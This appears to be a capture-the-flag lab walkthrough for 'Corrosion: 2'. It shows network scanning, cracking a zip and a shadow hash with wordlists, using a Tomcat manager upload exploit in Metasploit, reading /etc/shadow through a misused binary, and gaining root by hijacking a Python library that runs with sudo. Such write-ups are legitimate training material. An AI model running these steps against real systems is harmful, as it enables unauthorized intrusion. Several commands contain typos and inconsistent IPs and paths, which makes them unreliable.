LAB : Corrosion: 2

1
Pentest Methodology
• Network Scanning
• netdiscover
• nmap
• Enumeration
• dirb
• fcrackzip (Crack Password zip file)
• Exploitation
• Metasploit
• /etc/shadow
• john
• Privilege Escalation
• ssh
• python library hijacking
• root flag

2
Network Scanning
To begin, we must use the netdiscover command to scan the network for the target machine’s IP address.
# sudo netdiscover –r 192.168.10.0/24
The victim’s IP address, in this case, is 192.168.10.131.

3
Network Scanning
Tips fast Scan Using nmap
# nmap –sP 192.168.10.0/24

4
Network Scanning
going to use Nmap to help us move this process along. To see all of the services stated, we need to know which ones are now available.
# nmap -sV 192.168.1.186
According to the nmap output, we have:
• An SSH server is available on port 22.
• On port 80, there is an HTTP service (Apache Server).
• On port 8080, a Tomcat server is running on port 8080.

5
Enumeration
Let’s begin by looking at the http service on port 80. There’s nothing strange about that; it’s just an Apache server page.

6
Enumeration
Next, we looked at the Tomcat server, which was listening on port 8080. It’s a straightforward page with nothing suspicious on it.

7
Enumeration
discovered nothing harmful on websites. So, to continue further in this experiment, we use the dirb directory brute force method to find some knowledge.
Smash!! We discovered a directory containing a backup zip file.
# dirb http://192.168.10.131:8080/ -X .php,.zip

8
Enumeration
The backup zip file is then downloaded using the wget command. Following that, we attempted to study this file, but it was password protected.
# wget http://192.168.1.186:8080/backup.zip
# unzip backup.zip

9
Enumeration
Note : unzip rockyou.txt.gz and install fcrackzip

sudo gzip -d /use/share/wordlists/rocktoy.txt.gz

sudo apt install fcrackzip

10
Enumeration
Next, we’ll use the fcrackzip utility to crack this password. It is a lightweight, open-source zip file password cracker. The rockyou word-list is used for the
brute force attack. Boom!! We cracked its password in a matter of seconds (@administrator_hi5).
# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

Then we use this password to unzip the backup zip file. We attempt to inspect each and every file contained in this backup zip file. We are now
inspecting the tomcat users xml file.
# unzip backup.zip
# cat tomcat-users.xml

11
Enumeration

12
Enumeration
We discovered user admin and password melehifokivai credentials.

13
Exploitation
Now that we have the credentials, we can begin exploiting them using a Metasploit. In these instances, employing a Tomcat exploit is the best option.
Then give us all the information we need to use it, and we’re ready to go. As you can see, we had a meterpreter session.

> use exploit/multi/http/tomcat_mgr_upload

> set rhosts 192.168.1.186
> set rport 8080
> set httpusername admin
> set httppassword melehifokivai
> exploit

14
Exploitation

15
D
Shell
id
python3 -c 'import pty;pty.spawn("/bin/bash")'

16
Exploitation
just switched the directory to home. We discover that we have two users in this lab, Jaye and Randy. switched to user jaye. It has the same password
(melehifokivai) that we found out earlier.

# cd /home
# ls
# su jaye
# ls

17
Exploitation

18
Exploitation
discovered that this individual has a look called the .program that allows us to locate any file. As a result, we use it to locate the /etc/shadow file. Boom!!
We obtained the hash values of all users in this lab.

# ./look ‘’ /etc/shadow

19
Exploitation

20
Exploitations
Copy Hash user randy to txt file

21
Exploitation
As you are aware, we already have the password for user Jaye. We copy user randy’s hash value and save it in a file called hash.

Using John, who is a specialist in this case, we try to crack that hash. In a matter of seconds, we cracked the password 07051986randy.

# john --wordlist=/usr/share/wordlists/rockyou.txt hash

22
Exploitation

23
Privilege Escalation
Now, we have all of the necessary information to begin privilege escalation. To login via ssh as user randy, we use the cracked password
07051986randy.
# ssh [email protected]

Then we used the (sudo -l) tool to examine this user’s limits. We discovered that it can be abused by python library hijacking.

The randombase64.py python code can be used to perform this hijacking. which imports another file called base64.

# sudo -l
# cat /home/randy/randombase64.py

24
Privilege Escalation

25
Privilege Escalation

26
Privilege Escalation
To obtain base64 file coordinates, we use the locate command. In a couple of seconds, we discover its coordinates. We investigated the file’s
restrictions. Using this file, we can gain root access.

# locate base64
# ls -la /usr/lib/python3.8/base64.py

27
Privilege Escalation

28
Privilege Escalation
We made some changes to this base64 python file using the nano command. Add this code to get root access to the victim’s machine.

# import os
# os.system ("/bin/bash")

29
Privilege Escalation
We are now coordinating the use of both Python files. We obtained root access. We immediately changed the directory to root and received the root
flag in a matter of seconds.

# sudo /usr/bib/python3.8 /home/randy/randombase64.py

# cd /root
# cat root.txt

30
END

31